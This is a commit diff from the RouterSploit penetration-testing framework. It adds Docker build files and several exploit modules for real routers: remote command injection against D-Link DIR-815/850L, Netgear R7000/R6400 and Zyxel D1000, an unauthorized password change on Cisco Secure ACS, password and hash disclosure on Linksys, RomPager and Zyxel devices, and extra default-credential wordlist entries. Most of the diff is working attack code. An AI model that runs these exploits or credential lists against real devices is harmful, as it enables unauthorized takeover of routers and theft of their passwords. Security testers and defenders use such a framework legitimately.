Skip to content

R
routersploit
Commit d7129b8f by fwkz
Options

Merge branch 'master' into request-session

parents ffa9406a 790377cf
Showing with 756 additions and 18 deletions
Dockerfile 0 → 100644
FROM python:2.7
WORKDIR /routersploit
RUN git clone https://github.com/reverse-shell/routersploit/ .
RUN pip install -r requirements.txt
CMD ["python", "rsf.py"]
\ No newline at end of file
Makefile
# Makefile that aggregates common chores before commit
.PHONY: all clean lint lint-modules test build update run help
MODULE=''
all: lint test
......@@ -18,6 +20,15 @@ lint-modules:
test: clean
./run_tests.sh $(MODULE)
build:
docker build -t routersploit:latest -f Dockerfile .
update:
./run_docker.sh git pull
run:
./run_docker.sh
help:
@echo " clean"
@echo " Remove python artifacts."
......
README.md
......@@ -46,6 +46,13 @@ It consists of various modules that aids penetration testing operations:
sudo pip install -r requirements.txt
./rsf.py
## Running on Docker
git clone https://github.com/reverse-shell/routersploit
cd routersploit
docker build -t routersploit:latest -f Dockerfile .
./run_docker.sh
# Update
Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
......
routersploit/modules/creds/http_basic_bruteforce.py
......@@ -37,7 +37,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
......
routersploit/modules/creds/http_basic_default.py
......@@ -36,7 +36,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
......
routersploit/modules/exploits/cisco/secure_acs_bypass.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_status,
print_error,
mute,
validators,
http_request,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Cisco Secure ACS Unauthorized Password Change vulnerability.
If the target is vulnerable, it is possible to change user's password.
"""
__info__ = {
'name': 'Cisco Secure ACS Unauthorized Password Change',
'description': 'Module exploits an authentication bypass issue which allows arbitrary'
'password change requests to be issued for any user in the local store.'
'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well'
'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.',
'authors': [
'Jason Kratzer <pyoor[at]flinkd.org>', # vulnerability discovery & metasploit module
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html',
],
'devices': [
'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed',
'Cisco Secure ACS version 5.2 without any patches installed',
'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed'
],
}
target = exploits.Option('', 'Target IP address', validators=validators.url)
port = exploits.Option(443, 'Target Port')
path = exploits.Option('/PI/services/UCP/', 'Path to UCP WebService')
username = exploits.Option('', 'Username to use')
password = exploits.Option('', 'Password to use')
def run(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
headers = {'SOAPAction': '"changeUserPass"'}
data = ('<?xml version="1.0" encoding="utf-8"?>' + '\r\n'
'<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
'xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
'xmlns:xsd="http://www.w3.org/1999/XMLSchema">' + '\r\n'
'<SOAP-ENV:Body>' + '\r\n'
'<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + '\r\n'
'<v1 xsi:type="xsd:string">' + self.username + '</v1>' + '\r\n'
'<v2 xsi:type="xsd:string">fakepassword</v2>' + '\r\n'
'<v3 xsi:type="xsd:string">' + self.password + '</v3>' + '\r\n'
'</ns1:changeUserPass>'
'</SOAP-ENV:Body>' + '\r\n'
'</SOAP-ENV:Envelope>' + '\r\n\r\n')
print_status("Issuing password change request for: " + self.username)
response = http_request(method="POST", url=url, data=data, headers=headers)
if response is None:
print_error("Exploit failed. Target seems to be not vulnerable.")
return
if "success" in response.text:
print_success("Success! Password for {} has been changed to {}".format(self.username, self.password))
elif "Password has already been used" in response.text:
print_error("Failed! The supplied password has already been used.")
print_error("Please change the password and try again.")
elif "Invalid credentials for user" in response.text:
print_error("Failed! Username does not exist or target is not vulnerable.")
print_error("Please change the username and try again.")
else:
print_error("Failed! An unknown error has occurred.")
@mute
def check(self):
# it is not possible to verify if target is vulnerable without exploiting system
return None
routersploit/modules/exploits/cisco/ucm_info_disclosure.py
......@@ -7,6 +7,7 @@ from routersploit import (
print_error,
print_info,
mute,
validators,
)
......@@ -32,7 +33,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address', validators=validators.address)
payload = "\x00\x01" + "SPDefault.cnf.xml" + "\x00" + "netascii" + "\x00"
......
routersploit/modules/exploits/dlink/dir_815_850l_rce.py 0 → 100644
import socket
from routersploit import (
exploits,
print_status,
mute,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on the device.
"""
__info__ = {
'name': 'D-Link DIR-815 & DIR-850L RCE',
'description': 'Module exploits D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Samuel Huntley', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38715/',
],
'devices': [
'D-Link DIR-815',
'D-Link DIR-850L',
]
}
target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')
def run(self):
print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.")
print_status("Invoking command loop...")
print_status("It is blind command injection, response is not available")
shell(self, architecture="mipsel")
def execute(self, cmd):
buf = ('M-SEARCH * HTTP/1.1\r\n'
'HOST:' + self.target + ':1900\r\n'
'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
'MX:2\r\n'
'MAN:"ssdp:discover"\r\n\r\n')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((self.target, 1900))
s.send(buf)
s.close()
return ""
@mute
def check(self):
return None # it is not possible to check if target is vulnerable without exploiting it
routersploit/modules/exploits/huawei/hg520_info_dislosure.py
......@@ -7,6 +7,7 @@ from routersploit import (
print_success,
print_info,
mute,
validators,
)
......@@ -30,7 +31,7 @@ class Exploit(exploits.Exploit):
],
}
target = exploits.Option('', 'Target IP address') # target address
target = exploits.Option('', 'Target IP address', validators=validators.address) # target address
payload = ("\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00"
"\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00"
......
routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py 0 → 100644
import re
from routersploit import (
exploits,
mute,
validators,
http_request,
print_info,
print_success,
print_error,
)
class Exploit(exploits.Exploit):
"""
Exploit Linksys SMART WiFi firmware
If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
"""
__info__ = {
'name': 'Linksys SMART WiFi Password Disclosure',
'authors': [
'Sijmen Ruwhof', # vulnerability discovery
'0BuRner', # routersploit module
],
'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.',
'references': [
'https://www.kb.cert.org/vuls/id/447516',
'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243',
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243',
],
'devices': [
'Linksys EA2700 < Ver.1.1.40 (Build 162751)',
'Linksys EA3500 < Ver.1.1.40 (Build 162464)',
'Linksys E4200v2 < Ver.2.1.41 (Build 162351)',
'Linksys EA4500 < Ver.2.1.41 (Build 162351)',
'Linksys EA6200 < Ver.1.1.41 (Build 162599)',
'Linksys EA6300 < Ver.1.1.40 (Build 160989)',
'Linksys EA6400 < Ver.1.1.40 (Build 160989)',
'Linksys EA6500 < Ver.1.1.40 (Build 160989)',
'Linksys EA6700 < Ver.1.1.40 (Build 160989)',
'Linksys EA6900 < Ver.1.1.42 (Build 161129)',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
url = "{}:{}/.htpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
print_error("Exploit failed - connection error")
return
print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
print_success("Hash found:", response.text)
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/.htpasswd".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)
if len(res):
return True
return False
routersploit/modules/exploits/multi/rom0.py 0 → 100644
import io
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
)
from routersploit.utils import lzs
class Exploit(exploits.Exploit):
"""
Exploit implementation for RomPager ROM-0 authentication bypass vulnerability.
If the target is vulnerable it allows to download rom file and extract plaintext password.
"""
__info__ = {
'name': 'RomPager ROM-0',
'description': 'Exploits RomPager ROM-0 authentication bypass vulnerability that allows downloading rom file and extract password without credentials.',
'authors': [
'0BuRner', # routersploit module
],
'references': [
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-4019',
'http://www.osvdb.org/show/osvdb/102668',
'https://dariusfreamon.wordpress.com/tag/rompager/',
'http://rootatnasro.wordpress.com/2014/01/11/how-i-saved-your-a-from-the-zynos-rom-0-attack-full-disclosure/',
'https://antoniovazquezblanco.github.io/docs/advisories/Advisory_RomPagerXSS.pdf',
],
'devices': [
'AirLive WT-2000ARM (2.11.6.0(RE0.C29)3.7.6.1)',
'D-Link DSL-2520U (1.08 Hardware Version: B1)',
'D-Link DSL-2640R',
'D-Link DSL-2740R (EU_1.13 Hardware Version: A1)',
'Huawei 520 HG',
'Huawei 530 TRA',
'Pentagram Cerberus P 6331-42',
'TP-Link TD-8816',
'TP-Link TD-8817 (3.0.1 Build 110402 Rel.02846)',
'TP-LINK TD-8840T (3.0.0 Build 101208 Rel.36427)'
'TP-Link TD-W8901G',
'TP-Link TD-W8951ND',
'TP-Link TD-W8961ND',
'ZTE ZXV10 W300 (W300V1.0.0a_ZRD_CO3)',
'ZTE ZXDSL 831CII (ZXDSL 831CIIV2.2.1a_Z43_MD)'
'ZynOS',
'ZyXEL ES-2024',
'ZyXEL Prestige P-2602HW',
'ZyXEL Prestige 782R',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Downloading rom-0 file...")
url = "{}:{}/rom-0".format(self.target, self.port)
response = http_request(method="GET", url=url)
response.raise_for_status()
with io.BytesIO(response.content) as f:
print_status("Extracting password from file...")
password = self.extract_password(f)
print_success("Router password is: {}".format(password))
else:
print_error("Target is not vulnerable")
@staticmethod
def extract_password(fhandle):
fpos = 8568
fend = 8788
chunk = "*"
amount = 221
fhandle.seek(fpos)
while fpos < fend:
if fend - fpos < amount:
amount = fend - fpos
chunk = fhandle.read(amount)
fpos += len(chunk)
# Decompress chunk
result, window = lzs.LZSDecompress(chunk)
print_status('Decompressed chunk: {0}'.format(result))
# Extract plaintext password
res = re.findall(b'([\040-\176]{5,})', result)
return res[0]
@mute
def check(self):
url = "{}:{}/rom-0".format(self.target, self.port)
response = http_request(method="HEAD", url=url)
if response is None:
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
return True
return False
routersploit/modules/exploits/netgear/r7000_r6400_rce.py 0 → 100644
from routersploit import (
exploits,
print_status,
print_success,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
"""
__info__ = {
'name': 'Netgear R7000 & R6400 RCE',
'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is '
'vulnerable, command loop is invoked that allows executing commands on operating system level.',
'authors': [
'Chad Dougherty', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/',
'https://www.exploit-db.com/exploits/40889/',
'http://www.kb.cert.org/vuls/id/582384',
],
'devices': [
'R6400 (AC1750)',
'R7000 Nighthawk (AC1900, AC2300)',
'R7500 Nighthawk X4 (AC2350)',
'R7800 Nighthawk X4S(AC2600)',
'R8000 Nighthawk (AC3200)',
'R8500 Nighthawk X8 (AC5300)',
'R9000 Nighthawk X10 (AD7200)',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is probably vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
shell(self, architecture="arm")
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
cmd = cmd.replace(" ", "$IFS")
url = "{}:{}/cgi-bin/;{}".format(self.target, self.port, cmd)
http_request(method="GET", url=url)
return ""
@mute
def check(self):
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="HEAD", url=url)
if response is None:
return False # target is not vulnerable
if "WWW-Authenticate" in response.headers.keys():
if any(map(lambda x: x in response.headers['WWW-Authenticate'], ["NETGEAR R7000", "NETGEAR R6400"])):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/zyxel/d1000_rce.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_success,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Zyxel/Eir D1000 Remote Command Execution vulnerability.
If the target is vulnerable it allows to execute commands on operating system level.
"""
__info__ = {
'name': 'Zyxel Eir D1000 RCE',
'description': 'Module exploits Remote Command Execution vulnerability in Zyxel/Eir D1000 devices.'
'If the target is vulnerable it allows to execute commands on operating system level.',
'authors': [
'kenzo', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/',
'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759',
'https://broadband-forum.org/technical/download/TR-064.pdf',
],
'devices': [
'Zyxel EIR D1000',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(7547, 'Target port') # default port
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mips")
else:
print_error("Target seems to be not vulnerable")
def execute(self, cmd):
url = "{}:{}/UD/act?1".format(self.target, self.port)
headers = {"Content-Type": "text/xml",
"SOAPAction": "urn:dslforum-org:service:Time:1#SetNTPServers"}
data = ("<?xml version=\"1.0\"?>"
"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
" <SOAP-ENV:Body>"
" <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
" <NewNTPServer1>`{}`</NewNTPServer1>" # injection
" <NewNTPServer2></NewNTPServer2>"
" <NewNTPServer3></NewNTPServer3>"
" <NewNTPServer4></NewNTPServer4>"
" <NewNTPServer5></NewNTPServer5>"
" </u:SetNTPServers>"
" </SOAP-ENV:Body>"
"</SOAP-ENV:Envelope>").format(cmd)
http_request(method="POST", url=url, headers=headers, data=data)
return ""
@mute
def check(self): # todo: requires improvement
url = "{}:{}/globe".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
if response.status_code == 404 and "home_wan.htm" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/zyxel/d1000_wifi_password_disclosure.py 0 → 100644
import re
from routersploit import (
exploits,
print_error,
print_success,
http_request,
mute,
validators,
print_table,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Zyxel/Eir D1000 Password Disclosure vulnerability.
If the target is vulnerable it allows to read WiFi password.
"""
__info__ = {
'name': 'Zyxel Eir D1000 WiFi Password Disclosure',
'description': 'Module exploits WiFi Password Disclosure vulnerability in Zyxel/Eir D1000 devices.'
'If the target is vulnerable it allows to read WiFi password.',
'authors': [
'Xiphos http://www.xiphosresearch.com/', # vulnerability discovery, poc exploit
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://github.com/XiphosResearch/exploits/tree/master/tr-06fail',
],
'devices': [
'Zyxel EIR D1000',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(7547, 'Target port') # default port
def run(self):
creds = []
password = self.get_wifi_key()
if password is not None:
creds.append(("WiFi Password", password))
print_success("Target seems to be vulnerable")
print_table(("Parameter", "Value"), *creds)
else:
print_error("Target seems to be not vulnerable")
@mute
def check(self):
if self.get_wifi_key() is not None:
return True # target is vulnerable
return False # target is not vulnerable
def get_wifi_key(self):
url = "{}:{}/UD/act?1".format(self.target, self.port)
headers = {"SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"}
data = ("<?xml version=\"1.0\"?>"
"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
" <SOAP-ENV:Body>"
" <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
" </u:GetSecurityKeys>"
" </SOAP-ENV:Body>"
"</SOAP-ENV:Envelope>")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return None
password = re.findall("<NewPreSharedKey>(.*?)</NewPreSharedKey>", response.text)
if len(password):
return password[0]
return None
routersploit/utils.py routersploit/utils/__init__.py
from __future__ import print_function
from __future__ import absolute_import
from __future__ import print_function
import threading
import os
import sys
import re
import collections
import random
import string
import errno
import importlib
import os
import random
import re
import select
import socket
import errno
from functools import wraps
from distutils.util import strtobool
import string
import sys
import threading
from abc import ABCMeta, abstractmethod
from distutils.util import strtobool
from functools import wraps
import requests
from .printer import printer_queue, thread_output_stream
from .exceptions import RoutersploitException
from . import modules as rsf_modules
from .. import modules as rsf_modules
from ..exceptions import RoutersploitException
from ..printer import printer_queue, thread_output_stream
MODULES_DIR = rsf_modules.__path__[0]
CREDS_DIR = os.path.join(MODULES_DIR, 'creds')
......@@ -543,7 +543,7 @@ def tokenize(token_specification, text):
def create_exploit(path): # TODO: cover with tests
from .templates import exploit
from ..templates import exploit
parts = path.split(os.sep)
module_type, name = parts[0], parts[-1]
......
routersploit/utils/lzs.py 0 → 100644
# !/usr/bin/env python
# -*- coding:utf-8 -*-
##############################################################
# Lempel-Ziv-Stac decompression
# BitReader and RingList classes
#
# Copyright (C) 2011 Filippo Valsorda - FiloSottile
# filosottile.wiki gmail.com - www.pytux.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see &lt;http://www.gnu.org/licenses/&gt;.
#
##############################################################
import collections
class BitReader:
"""
Gets a string or a iterable of chars (also mmap)
representing bytes (ord) and permits to extract
bits one by one like a stream
"""
def __init__(self, bytes):
self._bits = collections.deque()
for byte in bytes:
byte = ord(byte)
for n in xrange(8):
self._bits.append(bool((byte >> (7 - n)) & 1))
def getBit(self):
return self._bits.popleft()
def getBits(self, num):
res = 0
for i in xrange(num):
res += self.getBit() << num - 1 - i
return res
def getByte(self):
return self.getBits(8)
def __len__(self):
return len(self._bits)
class RingList:
"""
When the list is full, for every item appended
the older is removed
"""
def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length
def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True
def get(self):
return self.__data__
def size(self):
return len(self.__data__)
def maxsize(self):
return self.__max__
def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n]
def LZSDecompress(data, window=RingList(2048)):
"""
Gets a string or a iterable of chars (also mmap)
representing bytes (ord) and an optional
pre-populated dictionary; return the decompressed
string and the final dictionary
"""
reader = BitReader(data)
result = ''
while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
# EOF
break
else:
offset = reader.getBits(11)
lenField = reader.getBits(2)
if lenField < 3:
lenght = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
lenght = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
lenght = 15 * lenCounter + 8 + lenField
for i in xrange(lenght):
char = window[-offset]
result += chr(char)
window.append(char)
return result, window
routersploit/wordlists/defaults.txt
......@@ -123,8 +123,10 @@ admin:123456
admin:2222
admin:22222
admin:362729
admin:Admin123
admin:AitbISP4eCiG
admin:Ascend
admin:BGCVDSL2
admin:NetCache
admin:OCS
admin:Protector
......@@ -148,6 +150,7 @@ admin:diamond
admin:epicrouter
admin:extendnet
admin:giraff
admin:gvt12345
admin:hagpolm1
admin:hello
admin:ho4uku6at
......@@ -364,6 +367,7 @@ super:surt
superadmin:secret
superadmin:Is$uper@dmin
superman:21241036
superman:superman
superman:talent
superuser:123456
superuser:admin
......@@ -387,6 +391,7 @@ teacher:password
tech:field
tech:tech
telco:telco
tele2:tele2
telecom:telecom
telecomadmin:telecomadmin
telecomadmin:admintelecom
......
routersploit/wordlists/passwords.txt
......@@ -38,6 +38,7 @@ $secure$
22222
222222
240653C9467E45
263297
266344
31994
3477
......@@ -66,6 +67,7 @@ ADMINISTRATOR
ADTRAN
ANS#150
Admin
Admin123
AitbISP4eCiG
Asante
Ascend
......@@ -290,6 +292,7 @@ gen1
gen2
ggdaseuaimhrke
ginger
gvt12345
guest
h179350
hagpolm1
......
run_docker.sh 0 → 100755
#!/usr/bin/env bash
if [ -z $1 ] ; then
docker run -it --net host --rm routersploit
else
docker run -it --net host --rm routersploit $@
fi
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment